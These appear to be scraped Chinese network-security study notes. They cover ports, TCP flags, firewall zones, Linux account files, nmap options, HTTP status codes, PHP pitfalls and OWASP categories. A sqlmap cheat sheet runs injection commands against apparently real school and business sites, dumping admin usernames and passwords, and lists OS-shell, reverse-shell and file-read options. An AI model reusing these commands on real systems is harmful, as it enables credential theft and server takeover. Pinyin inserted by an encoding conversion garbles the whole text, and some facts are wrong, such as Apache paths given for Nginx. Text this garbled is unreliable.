時(shí)間:2023-04-29 05:27:02 | 來(lái)源:網(wǎng)站運(yùn)營(yíng)
時(shí)間:2023-04-29 05:27:02 來(lái)源:網(wǎng)站運(yùn)營(yíng)
筆記:服務(wù)名稱 | 端口號(hào) | 檢測(cè)項(xiàng) |
---|---|---|
FTP | 21 | 口令爆破 |
SSH | 22 | 口令爆破 |
Telnet | 23 | 口令爆破,嗅探 |
DNS | 53 | DNS域傳送漏洞 |
HTTP | 80 | 各類web安全漏洞 |
Mssql | 1433 | 口令爆破 |
oracle | 1521 | 口令爆破 |
mysql | 3306 | 口令爆破 |
RDP | 3389 | 口令爆破 |
weblogic | 7001 | 弱口令、口令爆破反序列話漏洞 |
標(biāo)志位 | 全稱 | 含義 | 注釋 |
---|---|---|---|
URG | urgent | 緊急指針 | 數(shù)據(jù)有限推送到上層(綠色通道) |
ACK | acknowledgement | 確認(rèn)位 | 對(duì)你發(fā)給我的數(shù)據(jù)包的確認(rèn)(收到、好的、行) |
PSH | push | push | 數(shù)據(jù)推送到上層(常規(guī)通道) |
RST | reset | 復(fù)位連接 | 拒絕連接(不,我不在) |
SYN | synchronous | 請(qǐng)求建立連接 | 你好,我想和你說(shuō)話 |
FIN | finish | 斷開(kāi)連接 | 和平分手 |
區(qū)別 | 路由器 | 防火墻 |
---|---|---|
兩種設(shè)備產(chǎn)生的根源不同 | 路由器的產(chǎn)生是基于對(duì)網(wǎng)絡(luò)數(shù)據(jù)包路由而產(chǎn)生的。路由器需要完成的是將不同網(wǎng)絡(luò)的數(shù)據(jù)包進(jìn)行有效的路由。 | 防火墻是產(chǎn)生于人們對(duì)于安全性的需求。重點(diǎn)是這個(gè)(一系列)數(shù)據(jù)包是否應(yīng)該通過(guò)、通過(guò)后是否會(huì)對(duì)網(wǎng)絡(luò)造成危害。 |
根本目的不同 | 保持網(wǎng)絡(luò)和數(shù)據(jù)的 "通"。 | 保證任何非允許的數(shù)據(jù)包"不通"。 |
核心技術(shù)不同 | 路由器不能監(jiān)測(cè)TCP的狀態(tài) | 防火墻能夠檢測(cè)TCP的狀態(tài),并且可以重新隨機(jī)生成TCP的序列號(hào) |
安全策略制定的復(fù)雜程度不同 | 路由器的默認(rèn)配置對(duì)安全性的考慮不夠 | 防火墻的默認(rèn)配置既可以防止各種攻擊,達(dá)到既用既安全 |
對(duì)性能的影響不同 | 路由器是簡(jiǎn)單的包過(guò)濾,包過(guò)濾的規(guī)則條數(shù)的增加, NAT規(guī)則的條數(shù)的增加,對(duì)路由器性能的影響都相應(yīng)的增加 | 防火墻采用的是狀態(tài)包過(guò)濾,規(guī)則條數(shù),NAT的規(guī)則數(shù)對(duì)性能的影響接近于零。 |
審計(jì)功能的強(qiáng)弱差異巨大 | 路由器本身沒(méi)有日志、事件的存儲(chǔ)介質(zhì),只能通過(guò)采用外部的日志服務(wù)器等來(lái)完成對(duì)日志、事件的存儲(chǔ);路由器本身沒(méi)有審計(jì)分析工具,對(duì)日志、事件的描述采用的是不太容易理解的語(yǔ)言;路由器對(duì)攻擊等安全事件的響應(yīng)不完整,對(duì)于很多的攻擊、掃描等操作不能夠產(chǎn)生準(zhǔn)確及時(shí)的事件。審計(jì)功能的弱化,使管理員不能夠?qū)Π踩录M(jìn)行及時(shí)、準(zhǔn)確的響應(yīng) | NetEye防火墻的日志存儲(chǔ)介質(zhì)有兩種,包括本身的硬盤(pán)存儲(chǔ),和單獨(dú)的日志服務(wù)器;針對(duì)這兩種存儲(chǔ), NetEye 防火墻都提供了強(qiáng)大的審計(jì)分析工具,使管理員可以非常容易分析出各種安全隱患;NetEye 防火墻對(duì)安全事件的響應(yīng)的及時(shí)性,還體現(xiàn)在他的多種報(bào)警方式上,包括蜂鳴、trap、郵件、日志;NetEye 防火墻還具有實(shí)時(shí)監(jiān)控功能,可以在線監(jiān)控通過(guò)防火墻的連接,同時(shí)還可以捕捉數(shù)據(jù)包進(jìn)行分析,非分析網(wǎng)絡(luò)運(yùn)行情況,排除網(wǎng)絡(luò)故障提供了方便。 |
防范攻擊的能力不同 | 路由器將是保護(hù)內(nèi)部網(wǎng)的第一道關(guān)口 | 防火墻將是第二道關(guān)口,也是最為嚴(yán)格的一道關(guān)口 |
區(qū)域 | 默認(rèn)規(guī)則策略 |
---|---|
trusted | 允許所有的數(shù)據(jù)包流入流出 |
home | 拒絕流入的流量,除非與流出的流量相關(guān);而如果流量與ssh、ipp-client、amba-client與dhcpv6-client服務(wù)相關(guān),則允許流量 |
internal | 等同于home區(qū)域 |
work | 拒絕流入的流量,除非與流出的流量相關(guān);而如果流量與ssh、ipp-client、dhcpv6-client服務(wù)相關(guān),則允許流量 |
public | 拒絕流入的流量,除非與流出的流量相關(guān);而如果流量與ssh、dhcpv6-client服務(wù)相關(guān),則允許流量 |
external | 拒絕流入的流量,除非與流出的流量相關(guān);而如果流量與ssh服務(wù)相關(guān),則允許流量 |
dmz | 拒絕流入的流量,除非與流出的流量相關(guān);而如果流量與ssh服務(wù)相關(guān),則允許流量 |
block | 拒絕流入的流量,除非與流出的流量相關(guān) |
drop | 拒絕流入的流量,除非與流出的流量相關(guān) |
字段序號(hào) | 示例 | 解釋 | 說(shuō)明 |
---|---|---|---|
1 | root | 用戶名 | |
2 | x | 密碼占位符 | 用戶的密碼 x代表有密碼 無(wú)內(nèi)容,用戶登錄系統(tǒng)無(wú)需密碼 |
3 | 0 | UID | 當(dāng)前用戶的身份識(shí)別 0 就是超級(jí)管理員 |
4 | 0 | GID | 當(dāng)前用戶的基本組ID |
5 | root | 用戶的身份信息 | 現(xiàn)已廢棄 |
6 | /root | 用戶的家目錄 | 超管:/root 普通用戶:/home/用戶名 |
7 | /bin/bash | 用戶登錄系統(tǒng)后(默認(rèn))命令解釋器 | /sbin/nologin 不允許登錄系統(tǒng) /bin/sh /bin/bash |
字段序號(hào) | 示例 | 含義 | 說(shuō)明 |
---|---|---|---|
1 | root | 用戶名 | |
2 | $6$fcSW... | 密碼密文 | sha-512 HASH 散列算法 salt 值 加密后的密文 |
3 | 17632 | 密碼修改時(shí)間 | 距離1970 年1 月1 日 密碼最近一次的修改時(shí)間(天) |
4 | 0 | 密碼最短有效期 | 在最短有效期之內(nèi)不能修改密碼 3:三天之內(nèi)不可以修改自己的密碼 root 用戶不受此限制 |
5 | 99999 | 密碼最長(zhǎng)有效期 | 密碼可以使用多長(zhǎng)時(shí)間 建議設(shè)置成90 天 |
6 | 7 | 密碼過(guò)期時(shí)間 | 密碼過(guò)期前7 天會(huì)有警告提示 |
7 | 密碼的不活躍期 | 過(guò)了密碼有效期沒(méi)有修改密碼 處于不活躍期,仍然可以登錄系統(tǒng) | |
8 | 賬戶失效時(shí)間 | 密碼距離1970 年1 月1 日的失效時(shí)間(天) | |
9 | 未分配功能 |
數(shù)據(jù)庫(kù)類型 | 數(shù)據(jù)庫(kù) | 端口號(hào) |
---|---|---|
關(guān)系型數(shù)據(jù)庫(kù) | MySQL | 3306 |
Oracle | 1521 | |
SQL Server | 1433 | |
DB2 | 5000 | |
PostgreSQL | 5432 | |
國(guó)產(chǎn)的DM達(dá)夢(mèng)數(shù)據(jù)庫(kù) | 5236 | |
非關(guān)系型數(shù)據(jù)庫(kù) | Redis | 6379 |
Memcached | 11211 | |
MongoDB | 27017 |
select benchmark(10000,md5("123456"));計(jì)算123456的md5值,10000次
=:like
常見(jiàn)服務(wù) | 配置文件 | 日志文件 |
---|---|---|
Linux系統(tǒng) | /etc/passwd: 系統(tǒng)用戶數(shù)據(jù)庫(kù)文件. /etc/group: 組的數(shù)據(jù)庫(kù)文件. /etc/shadow(存放密碼). /etc/profile(系統(tǒng)環(huán)境). | /etc/logrotate.conf 日志文件各級(jí)的選項(xiàng) /var/log/message 內(nèi)核消息及各種應(yīng)用程序的公共日志信息 /var/log/secure 用戶認(rèn)證相關(guān)的安全事件信息 /var/log/cron Crond周期性計(jì)劃任務(wù)產(chǎn)生的時(shí)間信息 /var/log/lastlog 每個(gè)用戶最近的登錄事件 /var/log/wtmp 每個(gè)用戶登錄注銷及系統(tǒng)啟動(dòng)和停機(jī)事件 /var/log/btmp 失敗的、錯(cuò)誤的登錄嘗試及驗(yàn)證事件 /var/log/ maillog 進(jìn)入或發(fā)出系統(tǒng)的電子郵件活動(dòng) |
Nginx | 安裝目錄下的conf/nginx.conf文件 | 模塊的目錄: /etc/httpd/modules 日志目錄: /etc/log/httpd/* 訪問(wèn)日志為: ./access_ log 錯(cuò)誤日志為: ./err_ log 網(wǎng)頁(yè)的存放目錄: /var/www/html |
規(guī)則表名稱 | 作用 | 說(shuō)明 |
---|---|---|
raw | 流量跟蹤 | 確認(rèn)是否對(duì)該數(shù)據(jù)包進(jìn)行狀態(tài)跟蹤 |
mangle | 流量“整容” | 為數(shù)據(jù)包設(shè)置標(biāo)記 |
nat | 地址轉(zhuǎn)換 | 修改數(shù)據(jù)包中的源、目標(biāo)IP地址和端口 |
filter | 過(guò)濾,篩選 | 確認(rèn)是否放行該數(shù)據(jù)包(過(guò)濾) |
規(guī)則鏈名稱 | 作用 | 說(shuō)明 |
---|---|---|
PREROUTING | 在進(jìn)行路由選擇前處理數(shù)據(jù)包 | |
INPUT | 處理入站數(shù)據(jù)包 | 數(shù)據(jù)訪問(wèn)本機(jī)時(shí)候所限制規(guī)則的縮寫(xiě)位置 |
FORWARD | 處理轉(zhuǎn)發(fā)數(shù)據(jù)包 | 是否允許數(shù)據(jù)經(jīng)過(guò)我進(jìn)行轉(zhuǎn)發(fā) |
POSTROUTING | 在進(jìn)行路由選擇后處理數(shù)據(jù)包 | |
OUTPUT | 處理出站數(shù)據(jù)包 | 數(shù)據(jù)包向外發(fā)所寫(xiě)的規(guī)則限制(一般不寫(xiě)規(guī)則) |
nmap <target ip address(目標(biāo)主機(jī)ip)> #nmap簡(jiǎn)單掃描nmap -p(端口號(hào)) <target ip> #nmap 指定端口掃描nmap -p(range自定義掃描端口范圍)<target ip> #nmap自定義掃描nmap -sP <target ip> #ping掃描nmap -Pn <target ip> #不需要ping掃描nmap -O <yarget IP> #啟用遠(yuǎn)程操作系統(tǒng)檢測(cè)
參 數(shù) | 說(shuō) 明 |
---|---|
-sT | TCP connect()掃描,這種方式會(huì)在目標(biāo)主機(jī)的日志中記錄大批連接請(qǐng)求和錯(cuò)誤信息。 |
-sS | 半開(kāi)掃描,很少有系統(tǒng)能把它記入系統(tǒng)日志。不過(guò),需要Root權(quán)限。 |
-sF -sN | 秘密FIN數(shù)據(jù)包掃描、Xmas Tree、Null掃描模式 |
-sP | ping掃描,Nmap在掃描端口時(shí),默認(rèn)都會(huì)使用ping掃描,只有主機(jī)存活,Nmap才會(huì)繼續(xù)掃描。 |
-sU | UDP掃描,但UDP掃描是不可靠的 |
-sA | 這項(xiàng)高級(jí)的掃描方法通常用來(lái)穿過(guò)防火墻的規(guī)則集 |
-sV | 探測(cè)端口服務(wù)版本 |
-Pn | 掃描之前不需要用ping命令,有些防火墻禁止ping命令??梢允褂么诉x項(xiàng)進(jìn)行掃描 |
-v | 顯示掃描過(guò)程,推薦使用 |
-h | 幫助選項(xiàng),是最清楚的幫助文檔 |
-p | 指定端口,如“1-65535、1433、135、22、80”等 |
-O | 啟用遠(yuǎn)程操作系統(tǒng)檢測(cè),存在誤報(bào) |
-A | 全面系統(tǒng)檢測(cè)、啟用腳本檢測(cè)、掃描等 |
-oN/-oX/-oG | 將報(bào)告寫(xiě)入文件,分別是正常、XML、grepable 三種格式 |
-T4 | 針對(duì)TCP端口禁止動(dòng)態(tài)掃描延遲超過(guò)10ms |
-iL | 讀取主機(jī)列表,例如,“-iL C:/ip.txt” |
nmap --腳本默認(rèn),安全加載default和 safe類別中的所有腳本。nmap --script smb-os-discovery僅加載smb-os-discovery 腳本。請(qǐng)注意,.nse擴(kuò)展是可選的。nmap --script default,banner,/home/user/customscripts加載default 類別中的banner腳本、腳本和目錄中的所有 .nse文件 /home/user/customscripts。當(dāng)按名稱引用腳本時(shí)script.db,您可以使用 shell 樣式的 ' *' 通配符。nmap --script "http-*"加載名稱以 開(kāi)頭的所有腳本 http-,例如 http-auth和 http-open-proxy。參數(shù) to --script必須用引號(hào)引起來(lái)以保護(hù)通配符免受 shell 的影響。可以使用 、 和 運(yùn)算符構(gòu)建布爾表達(dá)式來(lái)完成更復(fù)雜的 and腳本or選擇 not。運(yùn)算符的 優(yōu)先級(jí) 與 Lua 中相同:not最高,然后 and是or。您可以使用括號(hào)更改優(yōu)先級(jí)。因?yàn)楸磉_(dá)式包含空格字符,所以需要引用它們。nmap --script“非侵入式”加載除 intrusive類別中的腳本之外的所有腳本。nmap --script "默認(rèn)或安全"這在功能上等同于 nmap --script "default,safe"。default它加載類別或safe類別或兩者中的所有腳本。nmap --script "默認(rèn)和安全"加載同時(shí)屬于default和 safe類別的那些腳本 。nmap --script "(默認(rèn)或安全或侵入性) 而不是 http-*"加載、 或類別中的腳本default, 名稱以 開(kāi)頭的腳本除外 。safeintrusivehttp-布爾表達(dá)式中的名稱可以是類別、來(lái)自 script.db或的文件名all。名稱是不包含 ' '、' ,'、' ('、' )' 或 ' ;' 的任何字符序列,除了作為運(yùn)算符的序列 and、or和 not。
當(dāng)使用的代碼為嵌套型(例如先猜表名 后猜指定字段時(shí)) 需要鍵入上一次用到的指令(如果上一次為參數(shù)要轉(zhuǎn)換) 參數(shù)轉(zhuǎn)換為指令 : --tables >> -T例如 要猜字段時(shí) 需要鍵入指定表段 */檢查注入點(diǎn) sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"列數(shù)據(jù)庫(kù)信息 sqlmap -u "http://www.scshlx.com/TeachView.asp?id=21" --dbs指定庫(kù)名列出所有表 //最大搜索線程為10 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables指定庫(kù)名表名列出所有字段 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" -T "雙引號(hào)下為指定表名admin" --columns指定庫(kù)名表名字段名dump出指定字段的內(nèi)容 sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"查詢表名下所有字段 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columnsMysql注入(有多個(gè)庫(kù) 必須找到有管理員的數(shù)據(jù)庫(kù)) --is-dba 當(dāng)前用戶權(quán)限 --dbs 所有數(shù)據(jù)庫(kù) --current-db 網(wǎng)站當(dāng)前數(shù)據(jù)庫(kù) --users 所有數(shù)據(jù)庫(kù)用戶 --current-user 當(dāng)前數(shù)據(jù)庫(kù)用戶 --tables-D"當(dāng)前數(shù)據(jù)庫(kù)名字" 查表名、 -T"指定的表名"-D"當(dāng)前數(shù)據(jù)庫(kù)名字"--columns 查字段Cookie注入(遇到防注入) sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2 列表名等 在上方代碼后面加--tables等; eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"有幾個(gè)參數(shù)可能會(huì)用到,直接加在最后面就可以了,更多詳細(xì)參數(shù)見(jiàn)官方文檔: –cookie=COOKIE 在需要登錄的地方,需要登錄后的cookie –proxy=”http://127.0.0.1:8087″ 使用HTTP代理隱藏自己的身份,比如使用goagent等 –sql-query=QUERY 執(zhí)行一個(gè)sql語(yǔ)句,不一定支持sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定數(shù) 據(jù)庫(kù)類型sqlmap -u “http://url/news?id=1″ -- users 列數(shù)據(jù)庫(kù)用戶sqlmap -u “http://url/news?id=1″ -- dbs 列數(shù)據(jù)庫(kù)sqlmap -u “http://url/news?id=1″ -- passwords 數(shù)據(jù)庫(kù)用戶密碼sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用戶 數(shù)據(jù)庫(kù)密碼sqlmap -u “http://url/news?id=1″ -- dump -C “password,user,id” -T “tablename”-D “db_name”–start 1 –stop 20 #列出指定字段,列出20 條sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有數(shù)據(jù)庫(kù)所有表sqlmap -u “http://url/news?id=1″ -- privileges #查看權(quán)限sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用戶權(quán)限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是數(shù)據(jù)庫(kù)管理員sqlmap -u “http://url/news?id=1″ –roles #枚舉數(shù)據(jù)庫(kù)用戶角色sqlmap -u “http://url/news?id=1″ -- udf-inject #導(dǎo)入用戶自定義函數(shù)(獲取 系統(tǒng)權(quán)限?。﹕qlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出當(dāng)前庫(kù)所有表sqlmap -u “http://url/news?id=1″ -- union-cols #union 查詢表記錄sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入sqlmap -u “http://url/news?id=1″ -- b #獲取banner信息sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入sqlmap -u “http://url/news?id=1″ - v 1 -f #指紋判別數(shù)據(jù)庫(kù)類型sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定關(guān)鍵詞sqlmap -u “http://url/news?id=1″ -- sql-shell #執(zhí)行指定sql命令sqlmap -u “http://url/news?id=1″ -- file /etc/passwdsqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #執(zhí)行系統(tǒng)命令sqlmap -u “http://url/news?id=1″ -- os-shell #系統(tǒng)交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反彈shellsqlmap -u “http://url/news?id=1″ -- reg-read #讀取win系統(tǒng)注冊(cè)表sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存進(jìn)度sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢復(fù) 已保存進(jìn)度
請(qǐng)求方法 | 說(shuō)明 |
---|---|
GET | 通常用于請(qǐng)求服務(wù)器發(fā)送某個(gè)資源(沒(méi)有請(qǐng)求正文) |
POST | 通常用于表單提交或文件上傳等功能(有請(qǐng)求正文) |
HEAD | 與GET 方法類似,但是服務(wù)器響應(yīng)中只返回首部(頭部),沒(méi)有正文 |
OPTIONS | 用來(lái)測(cè)試服務(wù)器所支持的方法 |
TRACE | 回顯瀏覽器的請(qǐng)求 |
PUT | PUT 方法會(huì)向服務(wù)器寫(xiě)入文檔 |
DELETE | 請(qǐng)求服務(wù)器刪除指定的資源 |
狀態(tài)碼 | 描述短語(yǔ) | 含義 |
---|---|---|
200 | OK | 表示從客戶端發(fā)送給服務(wù)器的請(qǐng)求被正常處理并返回 |
204 | No Content | 表示客戶端發(fā)送給客戶端的請(qǐng)求得到了成功處理,但在返回的響應(yīng)報(bào)文中不含實(shí)體的主體部分(沒(méi)有資源可以返回) |
206 | Patial Content | 表示客戶端進(jìn)行了范圍請(qǐng)求,并且服務(wù)器成功執(zhí)行了這部分的GET請(qǐng)求,響應(yīng)報(bào)文中包含由Content-Range指定范圍的實(shí)體內(nèi)容。 |
301 | Moved Permanently | 永久性重定向,表示請(qǐng)求的資源被分配了新的URL,之后應(yīng)使用更改的URL; |
302 | Found | 臨時(shí)性重定向,表示請(qǐng)求的資源被分配了新的URL,希望本次訪問(wèn)使用新的URL |
303 | See Other | 表示請(qǐng)求的資源被分配了新的URL,應(yīng)使用GET方法定向獲取請(qǐng)求的資源 |
304 | Not Modified | 表示客戶端發(fā)送附帶條件(是指采用GET方法的請(qǐng)求報(bào)文中包含if-Match、If-Modified-Since、If-None-Match、If-Range、If-Unmodified-Since中任一首部)的請(qǐng)求時(shí),服務(wù)器端允許訪問(wèn)資源,但是請(qǐng)求為滿足條件的情況下返回改狀態(tài)碼; |
307 | Temporary Redirect | 臨時(shí)重定向,與303有著相同的含義,307會(huì)遵照瀏覽器標(biāo)準(zhǔn)不會(huì)從POST變成GET;(不同瀏覽器可能會(huì)出現(xiàn)不同的情況) |
400 | Bad Request | 表示請(qǐng)求報(bào)文中存在語(yǔ)法錯(cuò)誤 |
401 | Unauthorized | 未經(jīng)許可,需要通過(guò)HTTP認(rèn)證 |
402 | Payment Required | 需付費(fèi) |
403 | Forbidden | 服務(wù)器拒絕該次訪問(wèn)(訪問(wèn)權(quán)限出現(xiàn)問(wèn)題) |
404 | Not Found | 表示服務(wù)器上無(wú)法找到請(qǐng)求的資源,除此之外,也可以在服務(wù)器拒絕請(qǐng)求但不想給拒絕原因時(shí)使用 |
405 | Method Not Allowed | 方法不被允許 |
406 | Not Acceptable | 無(wú)法接受 |
408 | Request Timeout | 請(qǐng)求超時(shí) |
409 | Conflict | 指令沖突 |
413 | Request Entity Too Large | 請(qǐng)求實(shí)體過(guò)大 |
414 | Request-URL Too Long | 所請(qǐng)求的URL地址過(guò)長(zhǎng) |
416 | Requested Range Not Satisfiable | 請(qǐng)求的范圍無(wú)法被滿足 |
417 | Expectation Failed | 預(yù)期內(nèi)容錯(cuò)誤 |
426 | Upgrade Required | 需升級(jí) |
429 | Too Many Requests | 數(shù)量過(guò)多 |
431 | Request Header Fields Too Large | 請(qǐng)求的頭字段過(guò)大 |
450 | Blocked by Windows Parental Controls | 已被wendows家長(zhǎng)控制程序屏蔽 |
500 | Inyermal Server Error | 內(nèi)部服務(wù)器錯(cuò)誤 |
507 | Insufficient Storage | 內(nèi)存不足 |
599 | Network connect timeout error | 錯(cuò)誤:網(wǎng)絡(luò)連接超時(shí) |
100 | continue | 繼續(xù) |
類別 | 原因短語(yǔ) | |
---|---|---|
1XX | Informational(信息性狀態(tài)碼) | 接受的請(qǐng)求正在處理 |
2XX | Success(成功狀態(tài)碼) | 請(qǐng)求正常處理完畢 |
3XX | Redirection(重定向) | 需要進(jìn)行附加操作以完成請(qǐng)求 |
4XX | Client error(客戶端錯(cuò)誤) | 客戶端請(qǐng)求出錯(cuò),服務(wù)器無(wú)法處理請(qǐng)求 |
5XX | Server Error(服務(wù)器錯(cuò)誤) | 服務(wù)器處理請(qǐng)求出錯(cuò) |
1|<?php2|$a = "0";3|$a_array = array("a" => "1","b" => "2");4|extract($a_array);5|echo "/$a = $a; /$b = $b";6|?>
a會(huì)被覆蓋為1 1|<?php 2|$auth = '0'; 3|import_request_variables('G'); 4| 5|if($auth == 1){ 6| echo "a"; 7|}else{ 8| echo "b"; 9|}10|?>
使用GET請(qǐng)求1|?auth=1
導(dǎo)致auth被覆蓋為1,輸出a1|<?php2|$a="1";3|$b="a";4|$$b="2";5|echo $a;6|?>
$$a=a,所以輸出為2危險(xiǎn)函數(shù) | 危險(xiǎn)等級(jí) | 功能描述 |
---|---|---|
phpinfo() | 中 | 輸出 PHP 環(huán)境信息以及相關(guān)的模塊、WEB 環(huán)境等信息。 |
passthru() | 高 | 允許執(zhí)行一個(gè)外部程序并回顯輸出,類似于 exec()。 |
exec() | 高 | 允許執(zhí)行一個(gè)外部程序(如 UNIX Shell 或 CMD 命令等)。 |
system() | 高 | 允許執(zhí)行一個(gè)外部程序并回顯輸出,類似于 passthru()。 |
chroot() | 高 | 可改變當(dāng)前 PHP 進(jìn)程的工作根目錄,僅當(dāng)系統(tǒng)支持 CLI 模式PHP 時(shí)才能工作,且該函數(shù)不適用于 Windows 系統(tǒng)。 |
scandir() | 中 | 列出指定路徑中的文件和目錄。 |
chgrp() | 高 | 改變文件或目錄所屬的用戶組。 |
chown() | 高 | 改變文件或目錄的所有者。 |
shell_exec() | 高 | 通過(guò) Shell 執(zhí)行命令,并將執(zhí)行結(jié)果作為字符串返回。 |
proc_open() | 高 | 執(zhí)行一個(gè)命令并打開(kāi)文件指針用于讀取以及寫(xiě)入。 |
proc_get_status() | 高 | 獲取使用 proc_open() 所打開(kāi)進(jìn)程的信息。 |
error_log() | 低 | 將錯(cuò)誤信息發(fā)送到指定位置(文件)。 安全備注:在某些版本的 PHP 中,可使用 error_log() 繞過(guò) PHP safe mode,執(zhí)行任意命令。 |
ini_alter() | 高 | 是 ini_set() 函數(shù)的一個(gè)別名函數(shù),功能與 ini_set() 相同。具體參見(jiàn) ini_set()。 |
ini_set() | 高 | 可用于修改、設(shè)置 PHP 環(huán)境配置參數(shù)。 |
ini_restore() | 高 | 可用于恢復(fù) PHP 環(huán)境配置參數(shù)到其初始值。 |
dl() | 高 | 在 PHP 進(jìn)行運(yùn)行過(guò)程當(dāng)中(而非啟動(dòng)時(shí))加載一個(gè) PHP 外部模塊。 |
pfsockopen() | 高 | 建立一個(gè) Internet 或 UNIX 域的 socket 持久連接。 |
syslog() | 中 | 可調(diào)用 UNIX 系統(tǒng)的系統(tǒng)層 syslog() 函數(shù)。 |
readlink() | 中 | 返回符號(hào)連接指向的目標(biāo)文件內(nèi)容。 |
symlink() | 高 | 在 UNIX 系統(tǒng)中建立一個(gè)符號(hào)鏈接。 |
popen() | 高 | 可通過(guò) popen() 的參數(shù)傳遞一條命令,并對(duì) popen() 所打開(kāi)的文件進(jìn)行執(zhí)行。 |
stream_socket_server() | 中 | 建立一個(gè) Internet 或 UNIX 服務(wù)器連接。 |
putenv() | 高 | 用于在 PHP 運(yùn)行時(shí)改變系統(tǒng)字符集環(huán)境。在低于 5、2、6 版本的 PHP 中,可利用該函數(shù)修改系統(tǒng)字符集環(huán)境后,利用 sendmail 指令發(fā)送特殊參數(shù)執(zhí)行系統(tǒng) SHELL 命令。 |
名稱 | 解釋 |
---|---|
A01:2021-失效的訪問(wèn)控制 Broken Access Control | 訪問(wèn)控制強(qiáng)制實(shí)施策略,使用戶無(wú)法在其預(yù)期權(quán)限之外進(jìn)行操作。失敗的訪問(wèn)控制通常會(huì)導(dǎo)致未經(jīng)授權(quán)的信息泄 露、修改或銷毀所有數(shù)據(jù)、或在用戶權(quán)限之外執(zhí)行業(yè)務(wù)功能。 |
A02:2021-加密機(jī)制失效 Cryptographic Failures | 首先要確認(rèn):對(duì)傳輸中數(shù)據(jù)和存儲(chǔ)數(shù)據(jù)都有哪些保護(hù)需求。 例如,密碼、信用卡號(hào)、醫(yī)療記錄、個(gè)人信息和商業(yè)秘 密需要額外保護(hù),尤其是在這些數(shù)據(jù)屬于隱私保護(hù)法(如:歐盟GDPR) 或法規(guī)條例(如:金融數(shù)據(jù)保護(hù)標(biāo)準(zhǔn)PCI DSS) 適用范圍的情況下。 |
A03:2021-注入 Injection | 在以下情況下,應(yīng)用程序易受攻擊: * 應(yīng)用程序不會(huì)驗(yàn)證、過(guò)濾或清洗用戶提供的數(shù)據(jù)。 * 動(dòng)態(tài)查詢或無(wú)上下文感知轉(zhuǎn)義的非參數(shù)化調(diào)用直接在解釋器中使用。 * 惡意數(shù)據(jù)在對(duì)象關(guān)系映射(ORM)搜索參數(shù)中用于提取額外的敏感記錄。 * 惡意數(shù)據(jù)被直接使用或連接。SQL或命令包含動(dòng)態(tài)查詢、命令或存儲(chǔ)過(guò)程中的結(jié)構(gòu)和惡意數(shù)據(jù)。 |
A04:2021-不安全設(shè)計(jì) Insecure Design | 不安全設(shè)計(jì)是一個(gè)廣泛的類別,代表不同的弱點(diǎn),表示為“缺少或無(wú)效的控制設(shè)計(jì)”。不安全設(shè)計(jì)不是所有其他前10個(gè)風(fēng)險(xiǎn)類別的來(lái)源。不安全設(shè)計(jì)和不安全的實(shí)現(xiàn)之間存在差異。我們區(qū)分設(shè)計(jì)缺陷和實(shí)現(xiàn)缺陷是有原因的,它們有不同的根本原因和補(bǔ)救措施。安全設(shè)計(jì)仍然可能存在實(shí)現(xiàn)缺陷,從而導(dǎo)致可能被利用的漏洞。一個(gè)不安全設(shè)計(jì)不能 通過(guò)一個(gè)完美的實(shí)現(xiàn)來(lái)修復(fù),因?yàn)楦鶕?jù)定義,所需的安全控制從未被創(chuàng)建來(lái)抵御特定的攻擊。導(dǎo)致不安全設(shè)計(jì)的因素之一是開(kāi)發(fā)的軟件或系統(tǒng)中缺乏固有的業(yè)務(wù)風(fēng)險(xiǎn)分析,因此無(wú)法確定需要何種級(jí)別的安全設(shè)計(jì)。 |
A05:2021-安全配置錯(cuò)誤 curity Misconfiguration | 您的應(yīng)用程序可能受到攻擊,如果應(yīng)用程序是: * 應(yīng)用程序棧的任何部分缺少適當(dāng)?shù)陌踩庸?或者云服務(wù)的權(quán)限配置錯(cuò)誤。 *應(yīng)用程序啟用或安裝了不必要的功能(例如:不必要的端口、服務(wù)、網(wǎng)頁(yè)、帳戶或權(quán)限)。 *默認(rèn)帳戶和密碼仍然可用且沒(méi)有更改。 * 錯(cuò)誤處理機(jī)制向用戶紕漏堆棧信息或其他大量錯(cuò)誤信息。 * 對(duì)于升級(jí)的系統(tǒng),最新的安全特性被禁用或未安全配置。 *應(yīng)用程序服務(wù)器、應(yīng)用程序框架(如:Struts、Spring、http://ASP.NET)、庫(kù)文件、數(shù)據(jù)庫(kù)等沒(méi)有進(jìn)行安全配置。 * 服務(wù)器不發(fā)送安全標(biāo)頭或指令,或未被設(shè)定安全參數(shù)。 *您的應(yīng)用軟件已過(guò)期或易受攻擊(參見(jiàn)“A6:2021-脆弱和過(guò)時(shí)的組件”)。 |
